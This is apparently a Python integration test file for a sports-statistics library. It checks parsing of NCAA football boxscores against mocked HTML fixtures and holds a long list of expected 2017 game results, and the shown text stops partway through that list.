0a0b2011d0bf72da6fe5f776597c2651014895bc | 168,583 | py | Python | tests/integration/boxscore/test_ncaaf_boxscore.py | ajhodges/sportsreference | 8cb38db3ff2c38806cb4a68482208fd5e0f3084a | ["MIT"] | null | null | null | tests/integration/boxscore/test_ncaaf_boxscore.py | ajhodges/sportsreference | 8cb38db3ff2c38806cb4a68482208fd5e0f3084a | ["MIT"] | null | null | null | tests/integration/boxscore/test_ncaaf_boxscore.py | ajhodges/sportsreference | 8cb38db3ff2c38806cb4a68482208fd5e0f3084a | ["MIT"] | null | null | null
import mock
import os
import pandas as pd
from datetime import datetime
from flexmock import flexmock
from sportsreference import utils
from sportsreference.constants import AWAY
from sportsreference.ncaaf.constants import BOXSCORE_URL, BOXSCORES_URL
from sportsreference.ncaaf.boxscore import Boxscore, Boxscores
MONTH = 10
YEAR = 2017
BOXSCORE = '2018-01-08-georgia'
def read_file(filename):
filepath = os.path.join(os.path.dirname(__file__), 'ncaaf', filename)
    with open(filepath, 'r', encoding='utf8') as fixture:
        return fixture.read()
def mock_pyquery(url):
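    # Stand-in for requests.get: return canned HTML fixtures so the tests
    # never touch the network.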
class MockPQ:
def __init__(self, html_contents):
self.status_code = 200
self.html_contents = html_contents
self.text = html_contents
if url == BOXSCORES_URL % (8, 30, 2017):
return MockPQ(read_file('boxscores-8-30-2017.html'))
if url == BOXSCORES_URL % (8, 31, 2017):
return MockPQ(read_file('boxscores-8-31-2017.html'))
boxscore = read_file('%s.html' % BOXSCORE)
return MockPQ(boxscore)
class MockDateTime:
def __init__(self, year, month):
self.year = year
self.month = month
class TestNCAAFBoxscore:
@mock.patch('requests.get', side_effect=mock_pyquery)
def setup_method(self, *args, **kwargs):
self.results = {
'date': 'Monday Jan 8, 2018',
'time': '8:00 PM ET',
'stadium': 'Mercedes-Benz Stadium - Atlanta, Georgia',
'winner': AWAY,
'winning_name': 'Alabama',
'winning_abbr': 'ALABAMA',
'losing_name': 'Georgia',
'losing_abbr': 'GEORGIA',
'away_points': 26,
'away_first_downs': 20,
'away_rush_attempts': 39,
'away_rush_yards': 184,
'away_rush_touchdowns': 0,
'away_pass_completions': 17,
'away_pass_attempts': 32,
'away_pass_yards': 187,
'away_pass_touchdowns': 3,
'away_interceptions': 1,
'away_total_yards': 371,
'away_fumbles': 0,
'away_fumbles_lost': 0,
'away_turnovers': 1,
'away_penalties': 6,
'away_yards_from_penalties': 41,
'home_points': 23,
'home_first_downs': 22,
'home_rush_attempts': 45,
'home_rush_yards': 133,
'home_rush_touchdowns': 1,
'home_pass_completions': 16,
'home_pass_attempts': 32,
'home_pass_yards': 232,
'home_pass_touchdowns': 1,
'home_interceptions': 2,
'home_total_yards': 365,
'home_fumbles': 0,
'home_fumbles_lost': 0,
'home_turnovers': 2,
'home_penalties': 6,
'home_yards_from_penalties': 65
}
flexmock(utils) \
.should_receive('_todays_date') \
.and_return(MockDateTime(YEAR, MONTH))
self.boxscore = Boxscore(BOXSCORE)
def test_ncaaf_boxscore_returns_requested_boxscore(self):
for attribute, value in self.results.items():
assert getattr(self.boxscore, attribute) == value
def test_invalid_url_yields_empty_class(self):
flexmock(Boxscore) \
.should_receive('_retrieve_html_page') \
.and_return(None)
boxscore = Boxscore(BOXSCORE)
for key, value in boxscore.__dict__.items():
if key == '_uri':
continue
assert value is None
def test_ncaaf_boxscore_dataframe_returns_dataframe_of_all_values(self):
df = pd.DataFrame([self.results], index=[BOXSCORE])
        # A plain ``==`` between DataFrames compares element-wise and requires
        # matching shapes, so equality is verified indirectly instead.
        # Concatenating the two DataFrames (the one generated during the test
        # and the expected one above) and dropping duplicate rows leaves only
        # the rows that are unique between the two frames. This allows a quick
        # check of the DataFrame to see if it is empty - if so, all rows are
        # duplicates, and they are equal.
frames = [df, self.boxscore.dataframe]
df1 = pd.concat(frames).drop_duplicates(keep=False)
assert df1.empty
def test_ncaaf_boxscore_players(self):
boxscore = Boxscore(BOXSCORE)
assert len(boxscore.home_players) == 30
assert len(boxscore.away_players) == 34
for player in boxscore.home_players:
assert not player.dataframe.empty
for player in boxscore.away_players:
assert not player.dataframe.empty
class TestNCAAFBoxscores:
def setup_method(self):
self.expected = {
'8-30-2017': [
{'boxscore': '2017-09-04-georgia-tech',
'away_name': 'Tennessee',
'away_abbr': 'tennessee',
'away_score': 42,
'away_rank': 25,
'home_name': 'Georgia Tech',
'home_abbr': 'georgia-tech',
'home_score': 41,
'home_rank': None,
'non_di': False,
'top_25': True,
'winning_name': 'Tennessee',
'winning_abbr': 'tennessee',
'losing_name': 'Georgia Tech',
'losing_abbr': 'georgia-tech'},
{'boxscore': '2017-09-03-ucla',
'away_name': 'Texas A&M',
'away_abbr': 'texas-am',
'away_score': 44,
'away_rank': None,
'home_name': 'UCLA',
'home_abbr': 'ucla',
'home_score': 45,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'UCLA',
'winning_abbr': 'ucla',
'losing_name': 'Texas A&M',
'losing_abbr': 'texas-am'},
{'boxscore': '2017-09-03-virginia-tech',
'away_name': 'West Virginia',
'away_abbr': 'west-virginia',
'away_score': 24,
'away_rank': 22,
'home_name': 'Virginia Tech',
'home_abbr': 'virginia-tech',
'home_score': 31,
'home_rank': 21,
'non_di': False,
'top_25': True,
'winning_name': 'Virginia Tech',
'winning_abbr': 'virginia-tech',
'losing_name': 'West Virginia',
'losing_abbr': 'west-virginia'},
{'boxscore': '2017-09-02-air-force',
'away_name': 'Virginia Military Institute',
'away_abbr': 'Virginia Military Institute',
'away_score': 0,
'away_rank': None,
'home_name': 'Air Force',
'home_abbr': 'air-force',
'home_score': 62,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-alabama-birmingham',
'away_name': 'Alabama A&M',
'away_abbr': 'Alabama A&M',
'away_score': 7,
'away_rank': None,
'home_name': 'UAB',
'home_abbr': 'alabama-birmingham',
'home_score': 38,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'UAB',
'winning_abbr': 'alabama-birmingham',
'losing_name': 'Alabama A&M',
'losing_abbr': 'Alabama A&M'},
{'boxscore': '2017-09-02-arizona',
'away_name': 'Northern Arizona',
'away_abbr': 'Northern Arizona',
'away_score': 24,
'away_rank': None,
'home_name': 'Arizona',
'home_abbr': 'arizona',
'home_score': 62,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Arizona',
'winning_abbr': 'arizona',
'losing_name': 'Northern Arizona',
'losing_abbr': 'Northern Arizona'},
{'boxscore': '2017-09-02-auburn',
'away_name': 'Georgia Southern',
'away_abbr': 'georgia-southern',
'away_score': 7,
'away_rank': None,
'home_name': 'Auburn',
'home_abbr': 'auburn',
'home_score': 41,
'home_rank': 12,
'non_di': False,
'top_25': True,
'winning_name': 'Auburn',
'winning_abbr': 'auburn',
'losing_name': 'Georgia Southern',
'losing_abbr': 'georgia-southern'},
{'boxscore': '2017-09-02-baylor',
'away_name': 'Liberty',
'away_abbr': 'Liberty',
'away_score': 48,
'away_rank': None,
'home_name': 'Baylor',
'home_abbr': 'baylor',
'home_score': 45,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Liberty',
'winning_abbr': 'Liberty',
'losing_name': 'Baylor',
'losing_abbr': 'baylor'},
{'boxscore': '2017-09-02-boise-state',
'away_name': 'Troy',
'away_abbr': 'troy',
'away_score': 13,
'away_rank': None,
'home_name': 'Boise State',
'home_abbr': 'boise-state',
'home_score': 24,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Boise State',
'winning_abbr': 'boise-state',
'losing_name': 'Troy',
'losing_abbr': 'troy'},
{'boxscore': '2017-09-02-brigham-young',
'away_name': 'LSU',
'away_abbr': 'louisiana-state',
'away_score': 27,
'away_rank': 13,
'home_name': 'Brigham Young',
'home_abbr': 'brigham-young',
'home_score': 0,
'home_rank': None,
'non_di': False,
'top_25': True,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-central-florida',
'away_name': 'Florida International',
'away_abbr': 'florida-international',
'away_score': 17,
'away_rank': None,
'home_name': 'UCF',
'home_abbr': 'central-florida',
'home_score': 61,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'UCF',
'winning_abbr': 'central-florida',
'losing_name': 'Florida International',
'losing_abbr': 'florida-international'},
{'boxscore': '2017-09-02-clemson',
'away_name': 'Kent State',
'away_abbr': 'kent-state',
'away_score': 3,
'away_rank': None,
'home_name': 'Clemson',
'home_abbr': 'clemson',
'home_score': 56,
'home_rank': 5,
'non_di': False,
'top_25': True,
'winning_name': 'Clemson',
'winning_abbr': 'clemson',
'losing_name': 'Kent State',
'losing_abbr': 'kent-state'},
{'boxscore': '2017-09-02-coastal-carolina',
'away_name': 'Massachusetts',
'away_abbr': 'massachusetts',
'away_score': 28,
'away_rank': None,
'home_name': 'Coastal Carolina',
'home_abbr': 'coastal-carolina',
'home_score': 38,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Coastal Carolina',
'winning_abbr': 'coastal-carolina',
'losing_name': 'Massachusetts',
'losing_abbr': 'massachusetts'},
{'boxscore': '2017-09-02-duke',
'away_name': 'North Carolina Central',
'away_abbr': 'North Carolina Central',
'away_score': 7,
'away_rank': None,
'home_name': 'Duke',
'home_abbr': 'duke',
'home_score': 60,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Duke',
'winning_abbr': 'duke',
'losing_name': 'North Carolina Central',
'losing_abbr': 'North Carolina Central'},
{'boxscore': '2017-09-02-east-carolina',
'away_name': 'James Madison',
'away_abbr': 'James Madison',
'away_score': 34,
'away_rank': None,
'home_name': 'East Carolina',
'home_abbr': 'east-carolina',
'home_score': 14,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'James Madison',
'winning_abbr': 'James Madison',
'losing_name': 'East Carolina',
'losing_abbr': 'east-carolina'},
{'boxscore': '2017-09-02-florida-state',
'away_name': 'Alabama',
'away_abbr': 'alabama',
'away_score': 24,
'away_rank': 1,
'home_name': 'Florida State',
'home_abbr': 'florida-state',
'home_score': 7,
'home_rank': 3,
'non_di': False,
'top_25': True,
'winning_name': 'Alabama',
'winning_abbr': 'alabama',
'losing_name': 'Florida State',
'losing_abbr': 'florida-state'},
{'boxscore': '2017-09-02-fresno-state',
'away_name': 'Incarnate Word',
'away_abbr': 'Incarnate Word',
'away_score': 0,
'away_rank': None,
'home_name': 'Fresno State',
'home_abbr': 'fresno-state',
'home_score': 66,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-georgia',
'away_name': 'Appalachian State',
'away_abbr': 'appalachian-state',
'away_score': 10,
'away_rank': None,
'home_name': 'Georgia',
'home_abbr': 'georgia',
'home_score': 31,
'home_rank': 15,
'non_di': False,
'top_25': True,
'winning_name': 'Georgia',
'winning_abbr': 'georgia',
'losing_name': 'Appalachian State',
'losing_abbr': 'appalachian-state'},
{'boxscore': '2017-09-02-hawaii',
'away_name': 'Western Carolina',
'away_abbr': 'Western Carolina',
'away_score': 18,
'away_rank': None,
'home_name': 'Hawaii',
'home_abbr': 'hawaii',
'home_score': 41,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Hawaii',
'winning_abbr': 'hawaii',
'losing_name': 'Western Carolina',
'losing_abbr': 'Western Carolina'},
{'boxscore': '2017-09-02-illinois',
'away_name': 'Ball State',
'away_abbr': 'ball-state',
'away_score': 21,
'away_rank': None,
'home_name': 'Illinois',
'home_abbr': 'illinois',
'home_score': 24,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Illinois',
'winning_abbr': 'illinois',
'losing_name': 'Ball State',
'losing_abbr': 'ball-state'},
{'boxscore': '2017-09-02-iowa',
'away_name': 'Wyoming',
'away_abbr': 'wyoming',
'away_score': 3,
'away_rank': None,
'home_name': 'Iowa',
'home_abbr': 'iowa',
'home_score': 24,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Iowa',
'winning_abbr': 'iowa',
'losing_name': 'Wyoming',
'losing_abbr': 'wyoming'},
{'boxscore': '2017-09-02-iowa-state',
'away_name': 'Northern Iowa',
'away_abbr': 'Northern Iowa',
'away_score': 24,
'away_rank': None,
'home_name': 'Iowa State',
'home_abbr': 'iowa-state',
'home_score': 42,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Iowa State',
'winning_abbr': 'iowa-state',
'losing_name': 'Northern Iowa',
'losing_abbr': 'Northern Iowa'},
{'boxscore': '2017-09-02-kansas',
'away_name': 'Southeast Missouri State',
'away_abbr': 'Southeast Missouri State',
'away_score': 16,
'away_rank': None,
'home_name': 'Kansas',
'home_abbr': 'kansas',
'home_score': 38,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Kansas',
'winning_abbr': 'kansas',
'losing_name': 'Southeast Missouri State',
'losing_abbr': 'Southeast Missouri State'},
{'boxscore': '2017-09-02-kansas-state',
'away_name': 'Central Arkansas',
'away_abbr': 'Central Arkansas',
'away_score': 19,
'away_rank': None,
'home_name': 'Kansas State',
'home_abbr': 'kansas-state',
'home_score': 55,
'home_rank': 20,
'non_di': True,
'top_25': True,
'winning_name': 'Kansas State',
'winning_abbr': 'kansas-state',
'losing_name': 'Central Arkansas',
'losing_abbr': 'Central Arkansas'},
{'boxscore': '2017-09-02-louisiana-lafayette',
'away_name': 'Southeastern Louisiana',
'away_abbr': 'Southeastern Louisiana',
'away_score': 48,
'away_rank': None,
'home_name': 'Louisiana',
'home_abbr': 'louisiana-lafayette',
'home_score': 51,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Louisiana',
'winning_abbr': 'louisiana-lafayette',
'losing_name': 'Southeastern Louisiana',
'losing_abbr': 'Southeastern Louisiana'},
{'boxscore': '2017-09-02-louisiana-tech',
'away_name': 'Northwestern State',
'away_abbr': 'Northwestern State',
'away_score': 24,
'away_rank': None,
'home_name': 'Louisiana Tech',
'home_abbr': 'louisiana-tech',
'home_score': 52,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Louisiana Tech',
'winning_abbr': 'louisiana-tech',
'losing_name': 'Northwestern State',
'losing_abbr': 'Northwestern State'},
{'boxscore': '2017-09-02-marshall',
'away_name': 'Miami (OH)',
'away_abbr': 'miami-oh',
'away_score': 26,
'away_rank': None,
'home_name': 'Marshall',
'home_abbr': 'marshall',
'home_score': 31,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Marshall',
'winning_abbr': 'marshall',
'losing_name': 'Miami (OH)',
'losing_abbr': 'miami-oh'},
{'boxscore': '2017-09-02-miami-fl',
'away_name': 'Bethune-Cookman',
'away_abbr': 'Bethune-Cookman',
'away_score': 13,
'away_rank': None,
'home_name': 'Miami (FL)',
'home_abbr': 'miami-fl',
'home_score': 41,
'home_rank': 18,
'non_di': True,
'top_25': True,
'winning_name': 'Miami (FL)',
'winning_abbr': 'miami-fl',
'losing_name': 'Bethune-Cookman',
'losing_abbr': 'Bethune-Cookman'},
{'boxscore': '2017-09-02-michigan',
'away_name': 'Florida',
'away_abbr': 'florida',
'away_score': 17,
'away_rank': 17,
'home_name': 'Michigan',
'home_abbr': 'michigan',
'home_score': 33,
'home_rank': 11,
'non_di': False,
'top_25': True,
'winning_name': 'Michigan',
'winning_abbr': 'michigan',
'losing_name': 'Florida',
'losing_abbr': 'florida'},
{'boxscore': '2017-09-02-michigan-state',
'away_name': 'Bowling Green State',
'away_abbr': 'bowling-green-state',
'away_score': 10,
'away_rank': None,
'home_name': 'Michigan State',
'home_abbr': 'michigan-state',
'home_score': 35,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Michigan State',
'winning_abbr': 'michigan-state',
'losing_name': 'Bowling Green State',
'losing_abbr': 'bowling-green-state'},
{'boxscore': '2017-09-02-middle-tennessee-state',
'away_name': 'Vanderbilt',
'away_abbr': 'vanderbilt',
'away_score': 28,
'away_rank': None,
'home_name': 'Middle Tennessee State',
'home_abbr': 'middle-tennessee-state',
'home_score': 6,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Vanderbilt',
'winning_abbr': 'vanderbilt',
'losing_name': 'Middle Tennessee State',
'losing_abbr': 'middle-tennessee-state'},
{'boxscore': '2017-09-02-mississippi',
'away_name': 'South Alabama',
'away_abbr': 'south-alabama',
'away_score': 27,
'away_rank': None,
'home_name': 'Ole Miss',
'home_abbr': 'mississippi',
'home_score': 47,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Ole Miss',
'winning_abbr': 'mississippi',
'losing_name': 'South Alabama',
'losing_abbr': 'south-alabama'},
{'boxscore': '2017-09-02-mississippi-state',
'away_name': 'Charleston Southern',
'away_abbr': 'Charleston Southern',
'away_score': 0,
'away_rank': None,
'home_name': 'Mississippi State',
'home_abbr': 'mississippi-state',
'home_score': 49,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-missouri',
'away_name': 'Missouri State',
'away_abbr': 'Missouri State',
'away_score': 43,
'away_rank': None,
'home_name': 'Missouri',
'home_abbr': 'missouri',
'home_score': 72,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Missouri',
'winning_abbr': 'missouri',
'losing_name': 'Missouri State',
'losing_abbr': 'Missouri State'},
{'boxscore': '2017-09-02-nebraska',
'away_name': 'Arkansas State',
'away_abbr': 'arkansas-state',
'away_score': 36,
'away_rank': None,
'home_name': 'Nebraska',
'home_abbr': 'nebraska',
'home_score': 43,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Nebraska',
'winning_abbr': 'nebraska',
'losing_name': 'Arkansas State',
'losing_abbr': 'arkansas-state'},
{'boxscore': '2017-09-02-nevada-las-vegas',
'away_name': 'Howard',
'away_abbr': 'Howard',
'away_score': 43,
'away_rank': None,
'home_name': 'UNLV',
'home_abbr': 'nevada-las-vegas',
'home_score': 40,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Howard',
'winning_abbr': 'Howard',
'losing_name': 'UNLV',
'losing_abbr': 'nevada-las-vegas'},
{'boxscore': '2017-09-02-new-mexico',
'away_name': 'Abilene Christian',
'away_abbr': 'Abilene Christian',
'away_score': 14,
'away_rank': None,
'home_name': 'New Mexico',
'home_abbr': 'new-mexico',
'home_score': 38,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'New Mexico',
'winning_abbr': 'new-mexico',
'losing_name': 'Abilene Christian',
'losing_abbr': 'Abilene Christian'},
{'boxscore': '2017-09-02-north-carolina',
'away_name': 'California',
'away_abbr': 'california',
'away_score': 35,
'away_rank': None,
'home_name': 'North Carolina',
'home_abbr': 'north-carolina',
'home_score': 30,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'California',
'winning_abbr': 'california',
'losing_name': 'North Carolina',
'losing_abbr': 'north-carolina'},
{'boxscore': '2017-09-02-north-carolina-state',
'away_name': 'South Carolina',
'away_abbr': 'south-carolina',
'away_score': 35,
'away_rank': None,
'home_name': 'North Carolina State',
'home_abbr': 'north-carolina-state',
'home_score': 28,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'South Carolina',
'winning_abbr': 'south-carolina',
'losing_name': 'North Carolina State',
'losing_abbr': 'north-carolina-state'},
{'boxscore': '2017-09-02-north-texas',
'away_name': 'Lamar',
'away_abbr': 'Lamar',
'away_score': 14,
'away_rank': None,
'home_name': 'North Texas',
'home_abbr': 'north-texas',
'home_score': 59,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'North Texas',
'winning_abbr': 'north-texas',
'losing_name': 'Lamar',
'losing_abbr': 'Lamar'},
{'boxscore': '2017-09-02-northwestern',
'away_name': 'Nevada',
'away_abbr': 'nevada',
'away_score': 20,
'away_rank': None,
'home_name': 'Northwestern',
'home_abbr': 'northwestern',
'home_score': 31,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Northwestern',
'winning_abbr': 'northwestern',
'losing_name': 'Nevada',
'losing_abbr': 'nevada'},
{'boxscore': '2017-09-02-notre-dame',
'away_name': 'Temple',
'away_abbr': 'temple',
'away_score': 16,
'away_rank': None,
'home_name': 'Notre Dame',
'home_abbr': 'notre-dame',
'home_score': 49,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Notre Dame',
'winning_abbr': 'notre-dame',
'losing_name': 'Temple',
'losing_abbr': 'temple'},
{'boxscore': '2017-09-02-ohio',
'away_name': 'Hampton',
'away_abbr': 'Hampton',
'away_score': 0,
'away_rank': None,
'home_name': 'Ohio',
'home_abbr': 'ohio',
'home_score': 59,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-oklahoma',
'away_name': 'UTEP',
'away_abbr': 'texas-el-paso',
'away_score': 7,
'away_rank': None,
'home_name': 'Oklahoma',
'home_abbr': 'oklahoma',
'home_score': 56,
'home_rank': 7,
'non_di': False,
'top_25': True,
'winning_name': 'Oklahoma',
'winning_abbr': 'oklahoma',
'losing_name': 'UTEP',
'losing_abbr': 'texas-el-paso'},
{'boxscore': '2017-09-02-oklahoma-state',
'away_name': 'Tulsa',
'away_abbr': 'tulsa',
'away_score': 24,
'away_rank': None,
'home_name': 'Oklahoma State',
'home_abbr': 'oklahoma-state',
'home_score': 59,
'home_rank': 10,
'non_di': False,
'top_25': True,
'winning_name': 'Oklahoma State',
'winning_abbr': 'oklahoma-state',
'losing_name': 'Tulsa',
'losing_abbr': 'tulsa'},
{'boxscore': '2017-09-02-old-dominion',
'away_name': 'Albany',
'away_abbr': 'Albany',
'away_score': 17,
'away_rank': None,
'home_name': 'Old Dominion',
'home_abbr': 'old-dominion',
'home_score': 31,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Old Dominion',
'winning_abbr': 'old-dominion',
'losing_name': 'Albany',
'losing_abbr': 'Albany'},
{'boxscore': '2017-09-02-oregon',
'away_name': 'Southern Utah',
'away_abbr': 'Southern Utah',
'away_score': 21,
'away_rank': None,
'home_name': 'Oregon',
'home_abbr': 'oregon',
'home_score': 77,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Oregon',
'winning_abbr': 'oregon',
'losing_name': 'Southern Utah',
'losing_abbr': 'Southern Utah'},
{'boxscore': '2017-09-02-oregon-state',
'away_name': 'Portland State',
'away_abbr': 'Portland State',
'away_score': 32,
'away_rank': None,
'home_name': 'Oregon State',
'home_abbr': 'oregon-state',
'home_score': 35,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Oregon State',
'winning_abbr': 'oregon-state',
'losing_name': 'Portland State',
'losing_abbr': 'Portland State'},
{'boxscore': '2017-09-02-penn-state',
'away_name': 'Akron',
'away_abbr': 'akron',
'away_score': 0,
'away_rank': None,
'home_name': 'Penn State',
'home_abbr': 'penn-state',
'home_score': 52,
'home_rank': 6,
'non_di': False,
'top_25': True,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-pittsburgh',
'away_name': 'Youngstown State',
'away_abbr': 'Youngstown State',
'away_score': 21,
'away_rank': None,
'home_name': 'Pitt',
'home_abbr': 'pittsburgh',
'home_score': 28,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Pitt',
'winning_abbr': 'pittsburgh',
'losing_name': 'Youngstown State',
'losing_abbr': 'Youngstown State'},
{'boxscore': '2017-09-02-purdue',
'away_name': 'Louisville',
'away_abbr': 'louisville',
'away_score': 35,
'away_rank': 16,
'home_name': 'Purdue',
'home_abbr': 'purdue',
'home_score': 28,
'home_rank': None,
'non_di': False,
'top_25': True,
'winning_name': 'Louisville',
'winning_abbr': 'louisville',
'losing_name': 'Purdue',
'losing_abbr': 'purdue'},
{'boxscore': '2017-09-02-san-diego-state',
'away_name': 'California-Davis',
'away_abbr': 'California-Davis',
'away_score': 17,
'away_rank': None,
'home_name': 'San Diego State',
'home_abbr': 'san-diego-state',
'home_score': 38,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'San Diego State',
'winning_abbr': 'san-diego-state',
'losing_name': 'California-Davis',
'losing_abbr': 'California-Davis'},
{'boxscore': '2017-09-02-san-jose-state',
'away_name': 'Cal Poly',
'away_abbr': 'Cal Poly',
'away_score': 13,
'away_rank': None,
'home_name': 'San Jose State',
'home_abbr': 'san-jose-state',
'home_score': 34,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'San Jose State',
'winning_abbr': 'san-jose-state',
'losing_name': 'Cal Poly',
'losing_abbr': 'Cal Poly'},
{'boxscore': '2017-09-02-south-florida',
'away_name': 'Stony Brook',
'away_abbr': 'Stony Brook',
'away_score': 17,
'away_rank': None,
'home_name': 'South Florida',
'home_abbr': 'south-florida',
'home_score': 31,
'home_rank': 19,
'non_di': True,
'top_25': True,
'winning_name': 'South Florida',
'winning_abbr': 'south-florida',
'losing_name': 'Stony Brook',
'losing_abbr': 'Stony Brook'},
{'boxscore': '2017-09-02-southern-california',
'away_name': 'Western Michigan',
'away_abbr': 'western-michigan',
'away_score': 31,
'away_rank': None,
'home_name': 'USC',
'home_abbr': 'southern-california',
'home_score': 49,
'home_rank': 4,
'non_di': False,
'top_25': True,
'winning_name': 'USC',
'winning_abbr': 'southern-california',
'losing_name': 'Western Michigan',
'losing_abbr': 'western-michigan'},
{'boxscore': '2017-09-02-southern-methodist',
'away_name': 'Stephen F. Austin',
'away_abbr': 'Stephen F. Austin',
'away_score': 14,
'away_rank': None,
'home_name': 'SMU',
'home_abbr': 'southern-methodist',
'home_score': 58,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'SMU',
'winning_abbr': 'southern-methodist',
'losing_name': 'Stephen F. Austin',
'losing_abbr': 'Stephen F. Austin'},
{'boxscore': '2017-09-02-southern-mississippi',
'away_name': 'Kentucky',
'away_abbr': 'kentucky',
'away_score': 24,
'away_rank': None,
'home_name': 'Southern Mississippi',
'home_abbr': 'southern-mississippi',
'home_score': 17,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Kentucky',
'winning_abbr': 'kentucky',
'losing_name': 'Southern Mississippi',
'losing_abbr': 'southern-mississippi'},
{'boxscore': '2017-09-02-texas',
'away_name': 'Maryland',
'away_abbr': 'maryland',
'away_score': 51,
'away_rank': None,
'home_name': 'Texas',
'home_abbr': 'texas',
'home_score': 41,
'home_rank': 23,
'non_di': False,
'top_25': True,
'winning_name': 'Maryland',
'winning_abbr': 'maryland',
'losing_name': 'Texas',
'losing_abbr': 'texas'},
{'boxscore': '2017-09-02-texas-christian',
'away_name': 'Jackson State',
'away_abbr': 'Jackson State',
'away_score': 0,
'away_rank': None,
'home_name': 'Texas Christian',
'home_abbr': 'texas-christian',
'home_score': 63,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-texas-state',
'away_name': '',
'away_abbr': '',
'away_score': 11,
'away_rank': None,
'home_name': 'Texas State',
'home_abbr': 'texas-state',
'home_score': 20,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Texas State',
'winning_abbr': 'texas-state',
'losing_name': '',
'losing_abbr': ''},
{'boxscore': '2017-09-02-texas-tech',
'away_name': 'Eastern Washington',
'away_abbr': 'Eastern Washington',
'away_score': 10,
'away_rank': None,
'home_name': 'Texas Tech',
'home_abbr': 'texas-tech',
'home_score': 56,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Texas Tech',
'winning_abbr': 'texas-tech',
'losing_name': 'Eastern Washington',
'losing_abbr': 'Eastern Washington'},
{'boxscore': '2017-09-02-tulane',
'away_name': 'Grambling State',
'away_abbr': 'Grambling State',
'away_score': 14,
'away_rank': None,
'home_name': 'Tulane',
'home_abbr': 'tulane',
'home_score': 43,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Tulane',
'winning_abbr': 'tulane',
'losing_name': 'Grambling State',
'losing_abbr': 'Grambling State'},
{'boxscore': '2017-09-02-virginia',
'away_name': 'William & Mary',
'away_abbr': 'William & Mary',
'away_score': 10,
'away_rank': None,
'home_name': 'Virginia',
'home_abbr': 'virginia',
'home_score': 28,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Virginia',
'winning_abbr': 'virginia',
'losing_name': 'William & Mary',
'losing_abbr': 'William & Mary'},
{'boxscore': '2017-09-02-washington-state',
'away_name': 'Montana State',
'away_abbr': 'Montana State',
'away_score': 0,
'away_rank': None,
'home_name': 'Washington State',
'home_abbr': 'washington-state',
'home_score': 31,
'home_rank': 24,
'non_di': True,
'top_25': True,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-western-kentucky',
'away_name': 'Eastern Kentucky',
'away_abbr': 'Eastern Kentucky',
'away_score': 17,
'away_rank': None,
'home_name': 'Western Kentucky',
'home_abbr': 'western-kentucky',
'home_score': 31,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Western Kentucky',
'winning_abbr': 'western-kentucky',
'losing_name': 'Eastern Kentucky',
'losing_abbr': 'Eastern Kentucky'},
{'boxscore': '2017-09-01-army',
'away_name': 'Fordham',
'away_abbr': 'Fordham',
'away_score': 6,
'away_rank': None,
'home_name': 'Army',
'home_abbr': 'army',
'home_score': 64,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Army',
